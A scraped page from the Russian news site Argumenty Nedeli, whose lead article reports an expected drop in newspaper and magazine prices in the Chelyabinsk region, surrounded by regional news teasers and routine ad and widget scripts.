						<div class="js-mediator-article"><p><strong>Цены на периодику в Челябинской области упадут. Такой вывод был сделан после анализа продаж прошлого года и озвучен сегодня, 12 января, на пресс-конференции медиа-холдинге &laquo;Гранада Пресс&raquo;.</strong></p>
<p>Как уточнил гендиректор региональной Роспечати Константин Федоронин, в этом году будет проведена большая ревизия цен на печатные издания, а также инициированы переговоры с издателями. Программа сокращения цен на периодику в регионе уже запущена.</p>
<p>Он уточнил, что прошлый год был довольно сложным, и издания лишь повышали цену. По мнению экспертов, это привело к падению спроса. Если цены вернуть на прежний уровень или даже уменьшить, читатель вернется. Радует одно &mdash; любителей бумажных версий газет и журналов осталось довольно много, так что печатная пресса умирать совершенно не намерена.</p>
<p>С глянцевыми журналами ситуация сложнее &mdash; качественная бумага и полиграфия не может стоить дешево. Поэтому несмотря на то, что цены и так старались держать в каких-то рамках, продажи все равно упали. К примеру, общее падение продаж прессы за прошлый год составило порядка 14 процентов.</p>
<p>- Примерно на этот процент, чтобы повысить рентабельность, и была поднята цена, - уточнил Константин Федоронин. - В 70% случаев это не дало положительного эффекта. Сейчас мы считаем, что желательно было бы вернуться к ценообразованию 2016 года.</p>
<p>Подробнее о том, какие изменения ждут газеты Челябинска и области, а также зачем в киосках печати продают шоколадки, читайте на сайте газеты &laquo;<a href="https://vecherka.su/articles/news/132786/">Вечерний Челябинск</a>&raquo;.</p></div>
						
					

					
											<!--<p><strong>Свежий номер «АРГУМЕНТЫ НЕДЕЛИ» доступен в <a href="https://t.me/argumentiru">Telegram</a></strong></p>-->
						

				</div>
			</article>
				<div id="publ_panel">

					<p class="er_info"><a href="javascript:void(0)" onclick="winop()">Ошибка в тексте? Пожалуйста, выделите ее и нажмите "Ctrl + Enter"</a>
					<span id="clicks" class="clicks"></span>
					

					<!--<script type="text/javascript">
						 $('#clicks').load('ar_clicks/ar_clicks.php?find=560485&date=2018-01-12');
					</script>--></p>

					<div id = "drop_sub">
						<a href="http://www.argumenti.ru/rss/argumenti_online.xml" target="_blank" rel="nofollow">RSS</a>,
						<a href="javascript:void(0);" onclick="return bookmark(this);">Избранное</a>,
						<a href="http://twitter.com/argumenti" target="_blank" rel="nofollow">Twitter</a>,
						<a href="http://www.facebook.com/pages/Argumentyru/110475665647188?ref=mf"  target="_blank" rel="nofollow">Facebook</a>,
						<a href="http://vkontakte.ru/club14409962" target="_blank" rel="nofollow">В Контакте</a>,
						<a href="http://my.mail.ru/community/argumenti" target="_blank" rel="nofollow">Мой мир</a>
					</div>

					<script type="text/javascript">
						// выпадающий список под ссылкой
						(function($) {
							$.fn.dropDownBlock = function(block, options) {
							var defaults = {
								speed: 'fast',
								top: $(this).height(),
								left: 0
							},
						opts 	= $.extend(defaults, options),
						toggler = $(this),
						block 	= $(block);
						toggler.css({'outline': 'none'})

						toggler.click(function(e) {
							e.preventDefault();
							$(block).css({
								'position' 	: 'absolute',
								'top' 		: (toggler.offset().top + opts['top']) + 'px',
								'left' 		: (toggler.offset().left + opts['left']) + 'px'
							});
						if($(block).is(':visible')) $(block).fadeOut(opts['speed']);
						else $(block).fadeIn(opts['speed']);
						this.focus();
						});
						toggler.blur(function() {
							$(block).fadeOut(opts['speed']);
						});
					};
				})(jQuery);

				$('#li_sub').dropDownBlock($('#drop_sub'));


			</script>



												<div id="initials">СФ</div>
									</div>


			<ul id="tags"><li>Теги:&nbsp;</li>
									<li>				<a href="http://argumenti.ru/search/%23%D0%A7%D0%B5%D0%BB%D1%8F%D0%B1%D0%B8%D0%BD%D1%81%D0%BA">Челябинск</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23%D0%BF%D1%80%D0%B5%D1%81%D1%81%D0%B0">пресса</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23%D0%A1%D0%9C%D0%98">СМИ</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23"></a>
			</li>
					</ul>
	

			
	    

<p id="comment_info">Обсудить наши публикации можно на страничках «АН» в <a href="http://facebook.com/argumentinedeli" target="_blank" rel="nofollow">Facebook</a> и <a href="http://vk.com/club14409962" target="_blank" rel="nofollow">ВКонтакте</a></p>

<script type="text/javascript">(function() {
  if (window.pluso)if (typeof window.pluso.start == "function") return;
  if (window.ifpluso==undefined) { window.ifpluso = 1;
    var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
    s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://share.pluso.ru/pluso-like.js';
    var h=d[g]('body')[0];
    h.appendChild(s);
  }})();</script>
<div class="pluso" data-background="none;" data-options="medium,square,line,horizontal,counter,sepcounter=1,theme=14" data-services="vkontakte,odnoklassniki,facebook,twitter,moimir"></div>
    
        <!-- Yandex.RTB R-A-50615-11 -->
<div id="yandex_rtb_R-A-50615-11"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-11",
                renderTo: "yandex_rtb_R-A-50615-11",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<p class="namerub"><span class="rem">//</span>Подписаться на рассылку эксклюзива от АН</p>
	<noindex>
		<iframe src="http://mailing.argumenti.ru/" style="width:97%; border: none;padding: 0px;">
	    	Ваш браузер не поддерживает плавающие фреймы!
		 </iframe>
	 </noindex>
    
    		

			<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/01/560493"><img src="http://argumenti.ru/images/preview/arhnews/32fc60743a421db2de9c8ac637685f3f.jpg" alt="Глава Южного Урала решил столетнюю проблему с очистными Верхнеуральска" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560493">Глава Южного Урала решил столетнюю проблему с очистными Верхнеуральска</a>
							<span class="rub_time">14:44</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560493">Губернатор Южного Урала Борис Дубровский посетил очистные сооружения Верхнеуральска и лично отметил окончание работ. Сейчас на оборудовании ведется пусконаладка, и уже к 2 апреля горожане получат чистую и вкусную воду, которая обеззараживается ультрафиолетом.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/incident/2018/01/560487"><img src="http://argumenti.ru/images/preview/arhnews/b034d4328c7bb75678008fa2055fd6ba.jpg" alt="Мать из Челябинска продала 13-летнюю дочь" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/incident/2018/01/560487">Мать из Челябинска продала 13-летнюю дочь</a>
							<span class="rub_time">13:38</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/incident/2018/01/560487">Мать с приятельницей была задержана в Москве сразу после передачи денег от покупателя, который приобрел  ее 13-летнюю дочь для собственных утех. К счастью, в сексуальное рабство девочка не попала — покупателем выступил оперативник.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/01/560485"><img src="http://argumenti.ru/images/preview/arhnews/a405d3cf091393d9b99131bd28fed071.jpg" alt="Почему подешевеют газеты на Южном Урале" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560485">Почему подешевеют газеты на Южном Урале</a>
							<span class="rub_time">13:35</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560485">Цены на периодику в Челябинской области упадут. Такой вывод был сделан после анализа продаж прошлого года и озвучен сегодня, 12 января, на пресс-конференции медиа-холдинге «Гранада Пресс».
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/01/560482"><img src="http://argumenti.ru/images/preview/arhnews/ca51063d3c657a93f23a2003eac20195.jpg" alt="Свыше 600 работников КМЭЗ сдадут экзамены по безопасности труда" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560482">Свыше 600 работников КМЭЗ сдадут экзамены по безопасности труда</a>
							<span class="rub_time">13:06</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560482">Специалисты Кыштымского медеэлектролитного завода сейчас заканчивают учебу по безопасности труда на высоте. Спецподготовку организовала Русская медная компания.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/01/560479"><img src="http://argumenti.ru/images/preview/arhnews/30eefac02ca9b1b5804e860ffbcdc06b.jpg" alt="Анатолий Литовченко посетил стройплощадку ледовой арены в Южноуральске" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560479">Анатолий Литовченко посетил стройплощадку ледовой арены в Южноуральске</a>
							<span class="rub_time">12:48</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560479">Депутат Государственной думы Анатолий Литовченко посетил строительную площадку ледовой арены «Южный Урал» в Южноуральске и лично убедился в том, что все работы находятся в финальной стадии. Открытие комплекса намечено на начало февраля.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560422">В. Кудряшов: Собственники должны ответственно относиться к имуществу дома</a>
							<span class="rub_time">11.01&nbsp;16:47</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560422">Сколько лет нужно копить собственникам на новый лифт и как сэкономить на отоплении при помощи приборов учета, знает гендиректор управляющей компании «Ремжилзаказчик» Владимир Кудряшов.
 <strong>>></strong>
		</a>
	</div>
</div>

				<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>

<br><br>																		
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560416">В Копейске из мусора научились делать топливо RDF</a>
							<span class="rub_time">11.01&nbsp;15:37</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560416">На мусорном полигоне возле поселка Старокамышинск, который расположен рядом с Копейском, открыта линия по переработке мусора и производству из него топлива RDF.  О том, как удалось  запустить практику использования отходов на благо жителей  рассказал председатель Совета директоров  Рафаил Рузбин
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560398">Впервые за 15 лет уровень безработицы в Челябинской области упал ниже 1,4%</a>
							<span class="rub_time">11.01&nbsp;14:19</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560398">К концу текущего года уровень официально регистрируемой безработицы в Челябинской области снизился до 1,38%. Это самый низкий показатель за последние 15 лет, отмечают эксперты GorodRabot.ru. В количественном отношении региональные службы занятости признали безработными около 25,5 тыс. граждан.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/economics/2018/01/560377"><img src="http://argumenti.ru/images/preview/arhnews/8db173cd0dabc33cbab322f6b58106d7.jpg" alt="ВСМ между Челябинском и Екатеринбургом могут построить в рамках концессии" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/economics/2018/01/560377">ВСМ между Челябинском и Екатеринбургом могут построить в рамках концессии</a>
							<span class="rub_time">11.01&nbsp;09:55</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/economics/2018/01/560377">Предложение о концессии было передано правительству РФ от экспертов хозяйственного партнерства «Уральская скоростная магистраль». Напомним, что высокоскоростная магистраль (ВСМ) протяженностью более 200 километров должна соединить два города-миллионника: Челябинск и Екатеринбург. Специалисты предложили возвести стратегически важную для всей России железную дорогу вскладчину с государством.
 <strong>>></strong>
		</a>
	</div>
</div>

						<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14115">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14115/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
																
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/01/560276"><img src="http://argumenti.ru/images/preview/arhnews/1fa9d5baab45c9b0a0e88375dd76e766.jpg" alt="К началу 2018 года на Южном Урале всего 7,8 процентов безработных" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560276">К началу 2018 года на Южном Урале всего 7,8 процентов безработных</a>
							<span class="rub_time">10.01&nbsp;14:14</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560276">По сравнению с началом прошлого года число безработных в регионе сократилось на 6.5 тысяч человек.  Удачно региональные власти справились с вопросом безработицы в Верхнем Уфалее, где было закрыто градообразующее предприятие, и тысячи жителей остались без работы.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/economics/2018/01/560275"><img src="http://argumenti.ru/images/preview/arhnews/497bacee24c3e0bd7feb29a4f173d5bc.jpeg" alt="Челябинская область готова войти в 20-ку лидеров по инвестпривлекательности" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/economics/2018/01/560275">Челябинская область готова войти в 20-ку лидеров по инвестпривлекательности</a>
							<span class="rub_time">10.01&nbsp;13:34</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/economics/2018/01/560275">По итогам 2017 года Южный Урал занял 21 место в рейтинге инвестпривлекательности, который был подсчитан для 85 субъектов РФ. Глава региона Борис Дубровский уверен, что у нас есть все шансы войти в 20-ку лидеров по данному показателю.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/culture/2018/01/560273"><img src="http://argumenti.ru/images/preview/arhnews/3e7412a297e2d7d57e9080e7388f27e5.jpg" alt="Южный Урал стал 15-м в рейтинге Дельфийских игр" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/culture/2018/01/560273">Южный Урал стал 15-м в рейтинге Дельфийских игр</a>
							<span class="rub_time">10.01&nbsp;13:34</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/culture/2018/01/560273">В начале этого года принято подводить итоги за минувший. Выяснилось, что Челябинская область в первый раз вошла в престижный творческий рейтинг Дельфийских игр. При этом из 20-ки лидеров регион занял 15 место.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560256">В Челябинской области газифицировали поселок Летягино</a>
							<span class="rub_time">10.01&nbsp;12:13</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560256">Благодаря помощи депутата Госдумы Анатолия Литовченко и областных властей у жителей поселка Летягино, что близ Южноуральска, появился долгожданный газ. Они ждали его 25 лет.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/01/560250"><img src="http://argumenti.ru/images/preview/arhnews/54fe57812e7d39e139c82f9c9bfb06ed.jpg" alt="РМК поздравила с Рождеством детей из Центра помощи в Карабаше" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560250">РМК поздравила с Рождеством детей из Центра помощи в Карабаше</a>
							<span class="rub_time">10.01&nbsp;10:43</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560250">Более 270 ребятишек из Карабаша побывали в этот понедельник, 8 января, на представлении в честь минувшего Рождества. 
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/01/560188"><img src="http://argumenti.ru/images/preview/arhnews/a7b245d86ae74bfff3eb8c66549141a5.jpg" alt="Супергерои из Челябинска спасли Землю" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/01/560188">Супергерои из Челябинска спасли Землю</a>
							<span class="rub_time">09.01&nbsp;14:31</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/01/560188">На протяжении 5 дней, с 2 по 6 января, челябинцы смогли  посетить инновационное шоу с использованием 3D-технологий, потрясающих сценических эффектов, костюмов и активного вовлечения зрителей в театральное представление «Галактические ёлки». 
 <strong>>></strong>
		</a>
	</div>
</div>

										<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10213">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/4/c/10213.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
												
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559600">Ветераны Южного Урала отправятся на лечение в санаторий</a>
							<span class="rub_time">28.12&nbsp;15:30</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559600">Благодаря инициативе депутата Госдумы Анатолия Литовченко, пока он был главой  Увельского района, восемь лет назад он начал предоставлять бесплатные путевки в местный санаторий «Восход». Со следующего года этот отдых и оздоровление будет доступны еще восьми территориям Челябинска и области. <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/news/2017/12/28/559590"><img src="http://argumenti.ru/images/preview/arhnews/59e682fd00bc88c54153f78a22010067.jpg" alt="Инна Забелкина, укротительница львов:  &laquo;Мне всегда хотелось чего-то душевного&raquo;" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/news/2017/12/28/559590">Инна Забелкина, укротительница львов:  &laquo;Мне всегда хотелось чего-то душевного&raquo;</a>
							<span class="rub_time">28.12&nbsp;13:54</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/news/2017/12/28/559590">В семь лет она впервые попыталась войти в клетку ко львам, с которыми работала сама Бугримова, легенда советского цирка. Девчонку поймали на полпути. После представления укротительница потребовала привести отважную малышку. «Сначала подрасти немножко, а лет через десять приходи», - напутствовала Ирина Николаевна <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2017/12/559589"><img src="http://argumenti.ru/images/preview/arhnews/276dd8bcca7959ca2f5d7ca904cd1b4c.jpg" alt="Информационный рекорд. &laquo;Гранада Пресс&raquo; провела за год  100 пресс-конференций" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559589">Информационный рекорд. &laquo;Гранада Пресс&raquo; провела за год  100 пресс-конференций</a>
							<span class="rub_time">28.12&nbsp;13:51</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559589">Несколько раз в неделю многие журналисты Челябинска и Челябинской области спешат на улицу Васенко, 63 (4 этаж) в пресс-центр медиахолдинга «Гранада Пресс». Более сотни (106) пресс-конференций, брифингов, круглых столов прошло здесь в 2017 году. И это не считая выездных мероприятий на выставках, в информационных центрах, конгресс-холлах. <strong>>></strong>
		</a>
	</div>
</div>

												
<div id="yandex_under_article" style="margin:0 auto"></div>
<script type="text/javascript">
if (window.matchMedia("only screen and (max-device-width: 100px)").matches){document.getElementById("yandex_under_article").style.width = "100px";var m= 2; ty="posterVertical"}
else if (window.matchMedia("only screen and (min-device-width: 100px)").matches){var m= 2; ty="vertical"}
(function(w, d, n, s, t) {
   w[n] = w[n] || [];
   w[n].push(function() {
       Ya.Direct.insertInto(50615, "yandex_under_article", {
           ad_format: "direct",
           font_size: 0.8,
           type: "horizontal",
           limit: 2,
           title_font_size: 1,
           links_underline: false,
           site_bg_color: "E7E7E7",
           bg_color: "E7E7E7",
           header_bg_color: "FFFFFF",
           border_color: "FFFFFF",
           title_color: "673366",
           url_color: "333333",
           text_color: "000000",
           hover_color: "0066FF",
           sitelinks_color: "0000CC",
           favicon: true,
           no_sitelinks: true
       });
   });
   t = d.getElementsByTagName("script")[0];
   s = d.createElement("script");
   s.src = "//an.yandex.ru/system/context.js";
   s.type = "text/javascript";
   s.async = true;
   t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script>  
										
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/consumer/2017/12/559473">Челиндбанк предлагает подарочные наборы монет из драгоценных металлов</a>
							<span class="rub_time">27.12&nbsp;16:01</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/consumer/2017/12/559473">В Челиндбанк поступили подарочные наборы из серебряных монет, которые станут отличным подарком к предстоящим праздникам. 			
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/culture/2017/12/559471"><img src="http://argumenti.ru/images/preview/arhnews/1441daf78634ddca66dc1d84e1eccd8f.jpg" alt="23 января в Челябинске состоится легендарный спектакль &laquo;Мастер и Маргарита&raquo;" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/culture/2017/12/559471">23 января в Челябинске состоится легендарный спектакль &laquo;Мастер и Маргарита&raquo;</a>
							<span class="rub_time">27.12&nbsp;15:27</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/culture/2017/12/559471">Вообще, «Мастер и Маргарита» не охотно поддается постановке. Не так-то это просто – втиснуть довольно крупное произведение в рамки спектакля. Задачу усложняет тесное переплетение сюжетных линий, да и вообще роман сам по себе окутан мистическим ореолом.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559462">Борис Дубровский и собака &laquo;Тора&raquo; поздравили южноуральцев с Новым годом</a>
							<span class="rub_time">27.12&nbsp;14:29</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559462">Глава Южного Урала Борис Дубровский вместе с символом наступающего нового 2018 года поздравил южноуральцев с наступающими праздниками.
 <strong>>></strong>
		</a>
	</div>
</div>

														
<p class="namerub"><span class="rem">//</span>Новости партнеров</p>
<div id="smi_teaser_3101">
    <center><a href="http://24smi.info" rel="nofollow">Агрегатор новостей 24СМИ</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
                (function() {
                var sm = document.createElement("script");
                sm.type = "text/javascript";
                sm.async = true;
                sm.src = "//jsn.24smi.net/6/2/3101.js";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(sm, s);})();</script>
            
<hr>								
			
				<div class="mainrub">
							
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559451">Анатолий Литовченко подарил игрушки и сладости воспитанникам приюта</a>
							<span class="rub_time">27.12&nbsp;14:14</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559451">Команда Анатолия Литовченко уже больше года регулярно приезжает в социально-реабилитационный центр Копейска для несовершеннолетних. Там сейчас находятся 16 ребят и девчат, от которых отказались родители.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2017/12/559434"><img src="http://argumenti.ru/images/preview/arhnews/882f1e93858fad56f7d881b535757faf.png" alt="В Челябинске рабочая группа по Томинскому ГОКу встретилась во второй раз" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559434">В Челябинске рабочая группа по Томинскому ГОКу встретилась во второй раз</a>
							<span class="rub_time">27.12&nbsp;10:53</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559434">Вчера, 26 декабря, в Общественной палате Южного Урала в второй раз встретились активисты и эксперты, которые обсудили воздействие будущего комбината на атмосферу и водные ресурсы региона.

 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2017/12/559358"><img src="http://argumenti.ru/images/preview/arhnews/26bf582cd76a5be8dcecaa934f230d58.jpg" alt="РМК получила диплом от &laquo;Форума Доноров&raquo;  за активную работу с жителями" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559358">РМК получила диплом от &laquo;Форума Доноров&raquo;  за активную работу с жителями</a>
							<span class="rub_time">26.12&nbsp;12:08</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559358">Благодаря реализации многочисленных социальных программ и активное вовлечение жителей Русская медная компания в этом году получила диплом от Ассоциации грантодающих организаций «Форум Доноров».  <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2017/12/559351"><img src="http://argumenti.ru/images/preview/arhnews/e7f01af6af0813e9d50b0fd717a6e927.jpg" alt="В шести районах Южного Урала выявлено свыше 600 хищений электричества" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559351">В шести районах Южного Урала выявлено свыше 600 хищений электричества</a>
							<span class="rub_time">26.12&nbsp;11:00</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559351">Специалисты филиала «Челябэнерго» с начала года обнаружили 626 случаев хищения электрической энергии в шести районах Южного Урала. Это удалось сделать благодаря проведению 467 рейдов. <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2017/12/559347"><img src="http://argumenti.ru/images/preview/arhnews/e7db01c7bd18c523da5b6eaf36520db6.jpg" alt="Вячеслав Скворцов: &laquo;Самые эффективные вложения &mdash; это вложения в детей&raquo;" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2017/12/559347">Вячеслав Скворцов: &laquo;Самые эффективные вложения &mdash; это вложения в детей&raquo;</a>
							<span class="rub_time">26.12&nbsp;10:32</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2017/12/559347">Первый председатель областной думы и Общественной палаты Челябинской области, основатель Союза промышленников и предпринимателей области, бывший депутат Госдумы и член Совета Федерации, благотворитель и публицист.
 <strong>>></strong>
		</a>
	</div>
</div>

																						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/health/2017/12/559303"><img src="http://argumenti.ru/images/preview/arhnews/ce255d47569a86956ab301052a704004.JPG" alt="2018 год РМК объявила Годом безопасного производства" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/health/2017/12/559303">2018 год РМК объявила Годом безопасного производства</a>
							<span class="rub_time">25.12&nbsp;17:07</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/health/2017/12/559303">РМК направит свои усилия на профилактику профессиональных заболеваний и использование средств индивидуальной защиты. На корпоративной конференции компания «3М Россия» как разработчик решений в данной сфере представила итоги аудита всех подразделений РМК и подписала Соглашение о сотрудничестве.

 <strong>>></strong>
		</a>
	</div>
</div>	
	

	            	
	<script id="js-mpf-mediator-init" data-counter="2820575" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//mediator.mail.ru/script/2820575/","_mediator")}(window);</script>		</section>
	</div>

			<div style="margin-top: 8px;" class="right">

<div class="adv_corp">
		<div id="smi2adblock_45368"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/45368.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>
</div>
		
		

		


				<noindex>
		<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14114">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14114/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->




		</noindex>
						
		
		<script async type='text/javascript' src='//s.luxupcdnc.com/t/common_402.js'></script>
<script class='__lxGc__' type='text/javascript'>
((__lxGc__=window.__lxGc__||{'s':{},'b':0})['s']['_183738']=__lxGc__['s']['_183738']||{'b':{}})['b']['_561097']={'i':__lxGc__.b++};
</script>
	


		<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10167">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
